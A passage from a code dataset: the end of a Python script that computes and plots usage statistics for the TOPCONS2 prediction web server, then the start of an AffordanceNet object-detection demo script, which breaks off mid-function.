week not in dict_submit_week:\n dict_submit_week[week] = [week_str] + 6*[0]\n if month not in dict_submit_month:\n dict_submit_month[month] = [month_str] + 6*[0]\n if year not in dict_submit_year:\n dict_submit_year[year] = [year_str] + 6*[0]\n dict_submit_day[day][1] += 1\n dict_submit_day[day][2] += numseq\n dict_submit_week[week][1] += 1\n dict_submit_week[week][2] += numseq\n dict_submit_month[month][1] += 1\n dict_submit_month[month][2] += numseq\n dict_submit_year[year][1] += 1\n dict_submit_year[year][2] += numseq\n if method_submission == \"web\":\n dict_submit_day[day][3] += 1\n dict_submit_day[day][4] += numseq\n dict_submit_week[week][3] += 1\n dict_submit_week[week][4] += numseq\n dict_submit_month[month][3] += 1\n dict_submit_month[month][4] += numseq\n dict_submit_year[year][3] += 1\n dict_submit_year[year][4] += numseq\n if method_submission == \"wsdl\":\n dict_submit_day[day][5] += 1\n dict_submit_day[day][6] += numseq\n dict_submit_week[week][5] += 1\n dict_submit_week[week][6] += numseq\n dict_submit_month[month][5] += 1\n dict_submit_month[month][6] += numseq\n dict_submit_year[year][5] += 1\n dict_submit_year[year][6] += numseq\n# }}}\n # Write to SQL{{{\n row = {}\n row['jobid'] = strs[1]\n row['jobname'] = strs[5]\n row['ip'] = strs[2]\n row['method_submission'] = method_submission\n row['numseq'] = numseq\n row['submit_date'] = submit_date_str\n row['email'] = strs[6]\n myfunc.WriteSQLiteAllSubmitted(cur_s, tablename=sql_tablename,\n data=[row])\n# }}}\n lines = hdl.readlines()\n hdl.close()\n\n con_s.commit()\n con_s.close()\n\n li_submit_day = []\n li_submit_week = []\n li_submit_month = []\n li_submit_year = []\n li_submit_day_web = []\n li_submit_week_web = []\n li_submit_month_web = []\n li_submit_year_web = []\n li_submit_day_wsdl = []\n li_submit_week_wsdl = []\n li_submit_month_wsdl = []\n li_submit_year_wsdl = []\n dict_list = [dict_submit_day, dict_submit_week, dict_submit_month,\n dict_submit_year]\n li_list = [li_submit_day, 
li_submit_week, li_submit_month, li_submit_year,\n li_submit_day_web, li_submit_week_web, li_submit_month_web,\n li_submit_year_web, li_submit_day_wsdl, li_submit_week_wsdl,\n li_submit_month_wsdl, li_submit_year_wsdl]\n\n for i in range(len(dict_list)):\n dt = dict_list[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n for j in range(3):\n li = li_list[j*4+i]\n k1 = j*2 + 1\n k2 = j*2 + 2\n for kk in range(len(sortedlist)):\n items = sortedlist[kk]\n if items[1][k1] > 0 or items[1][k2] > 0:\n li.append([items[1][0], items[1][k1], items[1][k2]])\n\n outfile_submit_day = f\"{path_stat}/submit_day.stat.txt\"\n outfile_submit_week = f\"{path_stat}/submit_week.stat.txt\"\n outfile_submit_month = f\"{path_stat}/submit_month.stat.txt\"\n outfile_submit_year = f\"{path_stat}/submit_year.stat.txt\"\n outfile_submit_day_web = f\"{path_stat}/submit_day_web.stat.txt\"\n outfile_submit_week_web = f\"{path_stat}/submit_week_web.stat.txt\"\n outfile_submit_month_web = f\"{path_stat}/submit_month_web.stat.txt\"\n outfile_submit_year_web = f\"{path_stat}/submit_year_web.stat.txt\"\n outfile_submit_day_wsdl = f\"{path_stat}/submit_day_wsdl.stat.txt\"\n outfile_submit_week_wsdl = f\"{path_stat}/submit_week_wsdl.stat.txt\"\n outfile_submit_month_wsdl = f\"{path_stat}/submit_month_wsdl.stat.txt\"\n outfile_submit_year_wsdl = f\"{path_stat}/submit_year_wsdl.stat.txt\"\n flist = [outfile_submit_day, outfile_submit_week, outfile_submit_month,\n outfile_submit_year,\n outfile_submit_day_web, outfile_submit_week_web,\n outfile_submit_month_web, outfile_submit_year_web,\n outfile_submit_day_wsdl, outfile_submit_week_wsdl,\n outfile_submit_month_wsdl, outfile_submit_year_wsdl]\n for i in range(len(flist)):\n outfile = flist[i]\n li = li_list[i]\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\t%s\\n\" % ('Date', 'numjob', 'numseq'))\n for j in range(len(li)): # name njob nseq\n fpout.write(\"%s\\t%d\\t%d\\n\" % (li[j][0], li[j][1], li[j][2]))\n fpout.close()\n 
except IOError:\n pass\n # plotting\n if os.path.exists(outfile) and li: # have at least one record\n # if os.path.basename(outfile).find('day') == -1:\n # extends date time series for missing dates\n freq = dataprocess.date_range_frequency(os.path.basename(outfile))\n try:\n dataprocess.extend_data(outfile,\n value_columns=['numjob', 'numseq'],\n freq=freq, outfile=outfile)\n except Exception as e:\n webcom.loginfo(f\"Failed to extend data for {outfile} with errmsg: {e}\",\n gen_errfile)\n pass\n cmd = [f\"{binpath_plot}/plot_numsubmit.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n # output waittime vs numseq_of_job\n # output finishtime vs numseq_of_job\n outfile_waittime_nseq = f\"{path_stat}/waittime_nseq.stat.txt\"\n outfile_waittime_nseq_web = f\"{path_stat}/waittime_nseq_web.stat.txt\"\n outfile_waittime_nseq_wsdl = f\"{path_stat}/waittime_nseq_wsdl.stat.txt\"\n outfile_finishtime_nseq = f\"{path_stat}/finishtime_nseq.stat.txt\"\n outfile_finishtime_nseq_web = f\"{path_stat}/finishtime_nseq_web.stat.txt\"\n outfile_finishtime_nseq_wsdl = f\"{path_stat}/finishtime_nseq_wsdl.stat.txt\"\n\n outfile_avg_waittime_nseq = f\"{path_stat}/avg_waittime_nseq.stat.txt\"\n outfile_avg_waittime_nseq_web = f\"{path_stat}/avg_waittime_nseq_web.stat.txt\"\n outfile_avg_waittime_nseq_wsdl = f\"{path_stat}/avg_waittime_nseq_wsdl.stat.txt\"\n outfile_avg_finishtime_nseq = f\"{path_stat}/avg_finishtime_nseq.stat.txt\"\n outfile_avg_finishtime_nseq_web = f\"{path_stat}/avg_finishtime_nseq_web.stat.txt\"\n outfile_avg_finishtime_nseq_wsdl = f\"{path_stat}/avg_finishtime_nseq_wsdl.stat.txt\"\n\n outfile_median_waittime_nseq = f\"{path_stat}/median_waittime_nseq.stat.txt\"\n outfile_median_waittime_nseq_web = f\"{path_stat}/median_waittime_nseq_web.stat.txt\"\n outfile_median_waittime_nseq_wsdl = f\"{path_stat}/median_waittime_nseq_wsdl.stat.txt\"\n outfile_median_finishtime_nseq = f\"{path_stat}/median_finishtime_nseq.stat.txt\"\n 
outfile_median_finishtime_nseq_web = f\"{path_stat}/median_finishtime_nseq_web.stat.txt\"\n outfile_median_finishtime_nseq_wsdl = f\"{path_stat}/median_finishtime_nseq_wsdl.stat.txt\"\n\n flist1 = [outfile_waittime_nseq, outfile_waittime_nseq_web,\n outfile_waittime_nseq_wsdl, outfile_finishtime_nseq,\n outfile_finishtime_nseq_web, outfile_finishtime_nseq_wsdl]\n\n flist2 = [outfile_avg_waittime_nseq, outfile_avg_waittime_nseq_web,\n outfile_avg_waittime_nseq_wsdl, outfile_avg_finishtime_nseq,\n outfile_avg_finishtime_nseq_web, outfile_avg_finishtime_nseq_wsdl]\n\n flist3 = [outfile_median_waittime_nseq,\n outfile_median_waittime_nseq_web,\n outfile_median_waittime_nseq_wsdl,\n outfile_median_finishtime_nseq,\n outfile_median_finishtime_nseq_web,\n outfile_median_finishtime_nseq_wsdl]\n\n dict_list = [waittime_numseq_dict, waittime_numseq_dict_web,\n waittime_numseq_dict_wsdl, finishtime_numseq_dict,\n finishtime_numseq_dict_web, finishtime_numseq_dict_wsdl]\n\n for i in range(len(flist1)):\n dt = dict_list[i]\n outfile1 = flist1[i]\n outfile2 = flist2[i]\n outfile3 = flist3[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n try:\n fpout = open(outfile1, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n for k in range(len(li_time)):\n fpout.write(\"%d\\t%f\\n\" % (nseq, li_time[k]))\n fpout.close()\n except IOError:\n pass\n try:\n fpout = open(outfile2, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n avg_time = myfunc.FloatDivision(sum(li_time), len(li_time))\n fpout.write(\"%d\\t%f\\n\" % (nseq, avg_time))\n fpout.close()\n except IOError:\n pass\n try:\n fpout = open(outfile3, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'time'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n li_time = sortedlist[j][1]\n median_time = 
numpy.median(li_time)\n fpout.write(\"%d\\t%f\\n\" % (nseq, median_time))\n fpout.close()\n except IOError:\n pass\n\n # plotting\n flist = flist1\n for i in range(len(flist)):\n outfile = flist[i]\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_nseq_waitfinishtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n flist = flist2 + flist3\n for i in range(len(flist)):\n outfile = flist[i]\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_avg_waitfinishtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n# }}}\n\n\ndef run_statistics_topcons2(webserver_root, gen_logfile, gen_errfile): # {{{\n \"\"\"Server usage analysis specifically for topcons2\"\"\"\n path_log = os.path.join(webserver_root, 'proj', 'pred', 'static', 'log')\n path_stat = os.path.join(path_log, 'stat')\n binpath_plot = os.path.join(webserver_root, \"env\", \"bin\")\n runtimelogfile = f\"{path_log}/jobruntime.log\"\n\n webcom.loginfo(\"Run usage statistics for TOPCONS2...\\n\", gen_logfile)\n # get longest predicted seq\n # get query with most TM helics\n # get query takes the longest time\n extreme_runtimelogfile = f\"{path_log}/stat/extreme_jobruntime.log\"\n\n longestlength = -1\n mostTM = -1\n longestruntime = -1.0\n line_mostTM = \"\"\n line_longestruntime = \"\"\n\n # 3. 
get running time vs sequence length\n cntseq = 0\n cnt_hasSP = 0\n outfile_runtime = f\"{path_stat}/length_runtime.stat.txt\"\n outfile_runtime_pfam = f\"{path_stat}/length_runtime.pfam.stat.txt\"\n outfile_runtime_cdd = f\"{path_stat}/length_runtime.cdd.stat.txt\"\n outfile_runtime_uniref = f\"{path_stat}/length_runtime.uniref.stat.txt\"\n outfile_runtime_avg = f\"{path_stat}/length_runtime.stat.avg.txt\"\n outfile_runtime_pfam_avg = f\"{path_stat}/length_runtime.pfam.stat.avg.txt\"\n outfile_runtime_cdd_avg = f\"{path_stat}/length_runtime.cdd.stat.avg.txt\"\n outfile_runtime_uniref_avg = f\"{path_stat}/length_runtime.uniref.stat.avg.txt\"\n li_length_runtime = []\n li_length_runtime_pfam = []\n li_length_runtime_cdd = []\n li_length_runtime_uniref = []\n dict_length_runtime = {}\n dict_length_runtime_pfam = {}\n dict_length_runtime_cdd = {}\n dict_length_runtime_uniref = {}\n li_length_runtime_avg = []\n li_length_runtime_pfam_avg = []\n li_length_runtime_cdd_avg = []\n li_length_runtime_uniref_avg = []\n hdl = myfunc.ReadLineByBlock(runtimelogfile)\n if not hdl.failure:\n lines = hdl.readlines()\n while lines is not None:\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) < 8:\n continue\n # jobid = strs[0]\n # seqidx = strs[1]\n runtime = -1.0\n try:\n runtime = float(strs[3])\n except (IndexError, ValueError):\n pass\n mtd_profile = strs[4]\n lengthseq = -1\n try:\n lengthseq = int(strs[5])\n except (IndexError, ValueError):\n pass\n\n numTM = -1\n try:\n numTM = int(strs[6])\n except (IndexError, ValueError):\n pass\n isHasSP = strs[7]\n\n cntseq += 1\n if isHasSP == \"True\":\n cnt_hasSP += 1\n\n if runtime > longestruntime:\n line_longestruntime = line\n longestruntime = runtime\n if lengthseq > longestlength:\n line_longestseq = line\n longestlength = lengthseq\n if numTM > mostTM:\n mostTM = numTM\n line_mostTM = line\n\n if lengthseq != -1:\n li_length_runtime.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime:\n 
dict_length_runtime[lengthseq] = []\n dict_length_runtime[lengthseq].append(runtime)\n if mtd_profile == \"pfam\":\n li_length_runtime_pfam.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_pfam:\n dict_length_runtime_pfam[lengthseq] = []\n dict_length_runtime_pfam[lengthseq].append(runtime)\n elif mtd_profile == \"cdd\":\n li_length_runtime_cdd.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_cdd:\n dict_length_runtime_cdd[lengthseq] = []\n dict_length_runtime_cdd[lengthseq].append(runtime)\n elif mtd_profile == \"uniref\":\n li_length_runtime_uniref.append([lengthseq, runtime])\n if lengthseq not in dict_length_runtime_uniref:\n dict_length_runtime_uniref[lengthseq] = []\n dict_length_runtime_uniref[lengthseq].append(runtime)\n lines = hdl.readlines()\n hdl.close()\n\n li_content = []\n for line in [line_mostTM, line_longestseq, line_longestruntime]:\n li_content.append(line)\n myfunc.WriteFile(\"\\n\".join(li_content)+\"\\n\", extreme_runtimelogfile,\n \"w\", True)\n\n # get lengthseq -vs- average_runtime\n dict_list = [dict_length_runtime, dict_length_runtime_pfam,\n dict_length_runtime_cdd, dict_length_runtime_uniref]\n li_list = [li_length_runtime_avg, li_length_runtime_pfam_avg,\n li_length_runtime_cdd_avg, li_length_runtime_uniref_avg]\n li_sum_runtime = [0.0]*len(dict_list)\n for i in range(len(dict_list)):\n dt = dict_list[i]\n li = li_list[i]\n for lengthseq in dt:\n avg_runtime = sum(dt[lengthseq])/float(len(dt[lengthseq]))\n li.append([lengthseq, avg_runtime])\n li_sum_runtime[i] += sum(dt[lengthseq])\n\n avg_runtime = myfunc.FloatDivision(li_sum_runtime[0],\n len(li_length_runtime))\n avg_runtime_pfam = myfunc.FloatDivision(li_sum_runtime[1],\n len(li_length_runtime_pfam))\n avg_runtime_cdd = myfunc.FloatDivision(li_sum_runtime[2],\n len(li_length_runtime_cdd))\n avg_runtime_uniref = myfunc.FloatDivision(li_sum_runtime[3],\n len(li_length_runtime_uniref))\n\n li_list = [li_length_runtime, 
li_length_runtime_pfam,\n li_length_runtime_cdd, li_length_runtime_uniref,\n li_length_runtime_avg, li_length_runtime_pfam_avg,\n li_length_runtime_cdd_avg, li_length_runtime_uniref_avg]\n flist = [outfile_runtime, outfile_runtime_pfam, outfile_runtime_cdd,\n outfile_runtime_uniref, outfile_runtime_avg,\n outfile_runtime_pfam_avg, outfile_runtime_cdd_avg,\n outfile_runtime_uniref_avg]\n for i in range(len(flist)):\n outfile = flist[i]\n li = li_list[i]\n sortedlist = sorted(li, key=lambda x: x[0])\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('lengthseq', 'runtime'))\n for j in range(len(sortedlist)):\n lengthseq = sortedlist[j][0]\n runtime = sortedlist[j][1]\n fpout.write(\"%d\\t%f\\n\" % (lengthseq, runtime))\n fpout.close()\n except IOError:\n continue\n\n outfile_avg_runtime = f\"{path_stat}/avg_runtime.stat.txt\"\n try:\n fpout = open(outfile_avg_runtime, \"w\")\n fpout.write(\"%s\\t%f\\n\" % (\"All\", avg_runtime))\n fpout.write(\"%s\\t%f\\n\" % (\"Pfam\", avg_runtime_pfam))\n fpout.write(\"%s\\t%f\\n\" % (\"CDD\", avg_runtime_cdd))\n fpout.write(\"%s\\t%f\\n\" % (\"Uniref\", avg_runtime_uniref))\n fpout.close()\n except IOError:\n pass\n if os.path.exists(outfile_avg_runtime):\n cmd = [f\"{binpath_plot}/plot_avg_runtime.sh\", outfile_avg_runtime]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n flist = [outfile_runtime, outfile_runtime_pfam,\n outfile_runtime_cdd, outfile_runtime_uniref]\n for outfile in flist:\n if os.path.exists(outfile):\n cmd = [f\"{binpath_plot}/plot_length_runtime.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n cmd = [f\"{binpath_plot}/plot_length_runtime_mtp.sh\", \"-pfam\",\n outfile_runtime_pfam, \"-cdd\", outfile_runtime_cdd, \"-uniref\",\n outfile_runtime_uniref, \"-sep-avg\"]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# 4. 
analysis for those predicted with signal peptide\n outfile_hasSP = f\"{path_stat}/noSP_hasSP.stat.txt\"\n content = \"%s\\t%d\\t%f\\n%s\\t%d\\t%f\\n\" % (\"\\\"Without SP\\\"\",\n cntseq-cnt_hasSP,\n myfunc.FloatDivision(cntseq-cnt_hasSP, cntseq),\n \"\\\"With SP\\\"\",\n cnt_hasSP,\n myfunc.FloatDivision(cnt_hasSP, cntseq))\n myfunc.WriteFile(content, outfile_hasSP, \"w\", True)\n cmd = [f\"{binpath_plot}/plot_nosp_sp.sh\", outfile_hasSP]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# }}}\n\n\ndef main(): # {{{\n \"\"\"main procedure\"\"\"\n parser = argparse.ArgumentParser(description='Run server statistics',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\\\nCreated 2022-03-05, updated 2022-03-05, Nanjiang Shu\n\nExamples:\n %s -i run_server_statistics.json\n''' % (sys.argv[0]))\n parser.add_argument('-i', metavar='JSONFILE', dest='jsonfile',\n type=str, required=True,\n help='Provide the Json file with all parameters')\n # parser.add_argument('-v', dest='verbose', nargs='?', type=int, default=0,\n # const=1,\n # help='show verbose information, (default: 0)')\n\n args = parser.parse_args()\n\n jsonfile = args.jsonfile\n\n if not os.path.exists(jsonfile):\n print(f\"Jsonfile {jsonfile} does not exist. 
Exit {progname}!\",\n file=sys.stderr)\n return 1\n\n g_params = {}\n g_params.update(webcom.LoadJsonFromFile(jsonfile))\n\n lockname = f\"{rootname_progname}.lock\"\n lock_file = os.path.join(g_params['path_log'], lockname)\n g_params['lockfile'] = lock_file\n fp = open(lock_file, 'w')\n try:\n fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n webcom.loginfo(f\"Another instance of {progname} is running\",\n g_params['gen_logfile'])\n return 1\n\n if 'DEBUG_LOCK_FILE' in g_params and g_params['DEBUG_LOCK_FILE']:\n time.sleep(g_params['SLEEP_INTERVAL']*6)\n status = run_statistics(g_params)\n if os.path.exists(lock_file):\n try:\n os.remove(lock_file)\n except OSError:\n webcom.loginfo(f\"Failed to delete lock_file {lock_file}\",\n g_params['gen_logfile'])\n return status\n# }}}\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/run_server_statistics.py","file_name":"run_server_statistics.py","file_ext":"py","file_size_in_byte":35116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127102574","text":"from __future__ import print_function\n\n\"\"\"\nUse the confidence of the object detection as the confidence for object classification.\nIf the predicted class is cup, pan, bowl, then the confidence is used as the confidence\nof container.\nIf the predicted class is other classes, then the confidence is 0.\nIf there is no prediction, then the confidence is 0.\n\nThis code generates map for a single view among all the view of the 3D scanning.\n\nAuthor: Hongtao Wu\nJuly 5, 2020\n\"\"\"\n\n\"\"\"\nSee README.md for installation instructions before running.\nDemo script to perform affordace detection from images\n\"\"\"\n\n\nimport _init_paths\nfrom fast_rcnn.config import cfg\nfrom fast_rcnn.test import im_detect2\nfrom fast_rcnn.nms_wrapper import nms\nfrom utils.timer import Timer\n\nimport numpy as np\nimport os, cv2\nimport argparse\nimport json\n\nimport 
caffe\n\n\nCONF_THRESHOLD = 0.9\ngood_range = 0.005\n \n# get current dir\ncwd = os.getcwd()\nroot_path = '/home/hongtao/src/affordance-net' # get parent path\nprint ('AffordanceNet root folder: ', root_path)\n# img_folder = cwd + '/img'\ndata_dir = '/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_benchmark_object'\nclass_folders = ['bowl', 'cup', 'drill', 'hammer', 'knife', 'pan', 'spatula']\n# class_folders = ['cup']\n\n\n\nOBJ_CLASSES = ('__background__', 'bowl', 'tvm', 'pan', 'hammer', 'knife', 'cup', 'drill', 'racket', 'spatula', 'bottle')\n\n# Mask\nbackground = [200, 222, 250] \nc1 = [0,0,205] # Contain\nc2 = [34,139,34] # Cut\nc3 = [192,192,128] # Display\nc4 = [165,42,42] # Engine\nc5 = [128,64,128] # grasp\nc6 = [204,102,0] # hit\nc7 = [184,134,11] # pound\nc8 = [0,153,153] # support\nc9 = [0,134,141] # w-grasp\nc10 = [184,0,141] \nc11 = [184,134,0] \nc12 = [184,134,223]\nlabel_colours = np.array([background, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12])\n\n# Object (Bounding box)\ncol0 = [0, 0, 0]\ncol1 = [0, 255, 255]\ncol2 = [255, 0, 255]\ncol3 = [0, 125, 255]\ncol4 = [55, 125, 0]\ncol5 = [255, 50, 75]\ncol6 = [100, 100, 50]\ncol7 = [25, 234, 54]\ncol8 = [156, 65, 15]\ncol9 = [215, 25, 155]\ncol10 = [25, 25, 155]\n\ncol_map = [col0, col1, col2, col3, col4, col5, col6, col7, col8, col9, col10]\n\n\n\n\n\n\ndef reset_mask_ids(mask, before_uni_ids):\n # reset ID mask values from [0, 1, 4] to [0, 1, 2] to resize later \n counter = 0\n for id in before_uni_ids:\n mask[mask == id] = counter\n counter += 1\n \n return mask\n \n\n \ndef convert_mask_to_original_ids_manual(mask, original_uni_ids):\n #TODO: speed up!!!\n temp_mask = np.copy(mask) # create temp mask to do np.around()\n temp_mask = np.around(temp_mask, decimals=0) # round 1.6 -> 2., 1.1 -> 1.\n current_uni_ids = np.unique(temp_mask)\n \n out_mask = np.full(mask.shape, 0, 'float32')\n \n mh, mw = mask.shape\n for i in range(mh-1):\n for j in range(mw-1):\n for k in range(1, 
len(current_uni_ids)):\n if mask[i][j] > (current_uni_ids[k] - good_range) and mask[i][j] < (current_uni_ids[k] + good_range): \n out_mask[i][j] = original_uni_ids[k] \n #mask[i][j] = current_uni_ids[k]\n \n# const = 0.005\n# out_mask = original_uni_ids[(np.abs(mask - original_uni_ids[:,None,None]) < const).argmax(0)]\n \n #return mask\n return out_mask\n \n\n\n\ndef draw_arrow(image, p, q, color, arrow_magnitude, thickness, line_type, shift):\n # draw arrow tail\n cv2.line(image, p, q, color, thickness, line_type, shift)\n # calc angle of the arrow\n angle = np.arctan2(p[1]-q[1], p[0]-q[0])\n # starting point of first line of arrow head\n p = (int(q[0] + arrow_magnitude * np.cos(angle + np.pi/4)),\n int(q[1] + arrow_magnitude * np.sin(angle + np.pi/4)))\n # draw first half of arrow head\n cv2.line(image, p, q, color, thickness, line_type, shift)\n # starting point of second line of arrow head\n p = (int(q[0] + arrow_magnitude * np.cos(angle - np.pi/4)),\n int(q[1] + arrow_magnitude * np.sin(angle - np.pi/4)))\n # draw second half of arrow head\n cv2.line(image, p, q, color, thickness, line_type, shift)\n \ndef draw_reg_text(img, obj_info):\n #print 'tbd'\n \n obj_id = obj_info[0]\n cfd = obj_info[1]\n xmin = obj_info[2]\n ymin = obj_info[3]\n xmax = obj_info[4]\n ymax = obj_info[5]\n \n draw_arrow(img, (xmin, ymin), (xmax, ymin), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmax, ymin), (xmax, ymax), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmax, ymax), (xmin, ymax), col_map[obj_id], 0, 5, 8, 0)\n draw_arrow(img, (xmin, ymax), (xmin, ymin), col_map[obj_id], 0, 5, 8, 0)\n \n # put text\n txt_obj = OBJ_CLASSES[obj_id] + ' ' + str(cfd)\n cv2.putText(img, txt_obj, (xmin, ymin-5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1) # draw with red\n #cv2.putText(img, txt_obj, (xmin, ymin), cv2.FONT_HERSHEY_SIMPLEX, 1, col_map[obj_id], 2)\n \n# # draw center\n# center_x = (xmax - xmin)/2 + xmin\n# center_y = (ymax - ymin)/2 + ymin\n# cv2.circle(img,(center_x, 
center_y), 3, (0, 255, 0), -1)\n \n return img\n\n\n\ndef visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh):\n\n inds = np.where(rois_class_score[:, -1] >= thresh)[0]\n if len(inds) == 0:\n print ('No detected box with probality > thresh = ', thresh, '-- Choossing highest confidence bounding box.')\n inds = [np.argmax(rois_class_score)] \n max_conf = np.max(rois_class_score)\n if max_conf < 0.001: \n return None, None, [] ## confidence is < 0.001 -- no good box --> must return\n \n\n rois_final = rois_final[inds, :]\n rois_class_score = rois_class_score[inds,:]\n rois_class_ind = rois_class_ind[inds,:]\n \n\n # get mask\n masks = masks[inds, :, :, :]\n \n im_width = im.shape[1]\n im_height = im.shape[0]\n \n im_ori = np.copy(im)\n # transpose\n im = im[:, :, (2, 1, 0)]\n \n\n num_boxes = rois_final.shape[0]\n \n list_bboxes = []\n\n \n for i in xrange(0, num_boxes):\n \n curr_mask = np.full((im_height, im_width), 0.0, 'float') # convert to int later\n \n class_id = int(rois_class_ind[i,0])\n \n bbox = rois_final[i, 1:5]\n score = rois_class_score[i,0]\n \n if cfg.TEST.MASK_REG:\n\n x1 = int(round(bbox[0]))\n y1 = int(round(bbox[1]))\n x2 = int(round(bbox[2]))\n y2 = int(round(bbox[3]))\n\n x1 = np.min((im_width - 1, np.max((0, x1))))\n y1 = np.min((im_height - 1, np.max((0, y1))))\n x2 = np.min((im_width - 1, np.max((0, x2))))\n y2 = np.min((im_height - 1, np.max((0, y2))))\n \n cur_box = [class_id, score, x1, y1, x2, y2]\n list_bboxes.append(cur_box)\n \n h = y2 - y1\n w = x2 - x1\n \n mask = masks[i, :, :, :]\n mask = np.argmax(mask, axis=0)\n \n \n original_uni_ids = np.unique(mask)\n # print \"original_uni_ids: \", original_uni_ids\n stop = np.sum(original_uni_ids > 9)\n\n\n # sort before_uni_ids and reset [0, 1, 7] to [0, 1, 2]\n original_uni_ids.sort()\n mask = reset_mask_ids(mask, original_uni_ids)\n \n mask = cv2.resize(mask.astype('float'), (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n 
#mask = convert_mask_to_original_ids(mask, original_uni_ids)\n mask = convert_mask_to_original_ids_manual(mask, original_uni_ids)\n \n #FOR MULTI CLASS MASK\n curr_mask[y1:y2, x1:x2] = mask # assign to output mask\n \n # visualize each mask\n curr_mask = curr_mask.astype('uint8')\n color_curr_mask = label_colours.take(curr_mask, axis=0).astype('uint8')\n if stop:\n cv2.imshow('Mask' + str(i), color_curr_mask)\n cv2.imshow('Obj detection', img_out)\n cv2.waitKey(0) \n # cv2.imwrite(os.path.join(benchmark_folder,'mask_' + str(i) + '_' + im_name), color_curr_mask)\n\n\n # ori_file_path = img_folder + '/' + im_name \n # img_org = cv2.imread(ori_file_path)\n for ab in list_bboxes:\n print ('box: ', ab)\n img_out = draw_reg_text(im_ori, ab)\n \n \n # cv2.imshow('Obj detection', img_out)\n # cv2.waitKey(0)\n # cv2.imwrite(os.path.join(benchmark_folder, 'objdet_' + im_name), img_out)\n\n return color_curr_mask, img_out, list_bboxes\n \n\n\ndef run_affordance_net(net, image_name):\n\n im_file = img_folder + '/' + im_name\n im = cv2.imread(im_file)\n \n ori_height, ori_width, _ = im.shape\n \n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = im_detect2(net, im)\n else:\n 1\n timer.toc()\n \n # Visualize detections for each class\n color_cuur_mask, img_out, list_bboxes = visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n return color_cuur_mask, img_out\n\n\ndef run_affordance_net_map(net, image_name):\n im_file = img_folder + '/' + im_name\n im = cv2.imread(im_file)\n\n ori_height, ori_width, _ = im.shape\n\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = im_detect2(net, im)\n else:\n 1\n\n # print \"rois_final: \", rois_final\n # print \"scores shape: \", scores.shape\n # print \"masks shape: \", masks.shape\n # print 
\"boxes shape: \", boxes.shape\n # print \"rois_class_score: \", rois_class_score, rois_class_score.shape\n # print \"rois_class_ind: \", rois_class_ind, rois_class_ind.shape\n \n assert rois_class_score.shape == rois_class_ind.shape\n\n # Use the bounding box with the largest score as the classification result.\n largest_cfd_idx = np.argmax(rois_class_score)\n # print \"largest_cfd_idx: \", largest_cfd_idx\n\n obj_cfd = rois_class_score[largest_cfd_idx][0]\n obj_classification_idx = rois_class_ind[largest_cfd_idx][0]\n\n # Find the bounding box in scores\n largest_cfd_idx_in_score = np.where(scores==obj_cfd)\n\n # If there is no detection then the container cfd equals 0\n if rois_class_score[0][0] == -1:\n obj_iscontainer = False\n obj_container_cfd = 0.0\n else:\n # Open container idx: bowl(1), cup(6), pan(3)\n if obj_classification_idx == 1 or obj_classification_idx == 3 or obj_classification_idx == 6:\n # print \"Object is classified as an open container\"\n obj_iscontainer = True\n else:\n obj_iscontainer = False\n \n bbox_score_list = scores[largest_cfd_idx_in_score[0][0],:]\n # print \"bbox_score_list sum: \", np.sum(bbox_score_list)\n bbox_container_score_list = np.array([bbox_score_list[1], bbox_score_list[3], bbox_score_list[6]])\n # print \"bbox_container_score_list: \", bbox_container_score_list\n obj_container_cfd = np.max(bbox_container_score_list)\n\n # print \"obj_iscontainer: \", obj_iscontainer\n # print \"obj_container_cfd: \", obj_container_cfd\n\n color_curr_mask, img_out = visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n return obj_iscontainer, obj_container_cfd, color_curr_mask, img_out\n\n\ndef run_affordance_net_map_direct_crop(net, crop_img):\n\n ori_height, ori_width, _ = crop_img.shape\n\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = 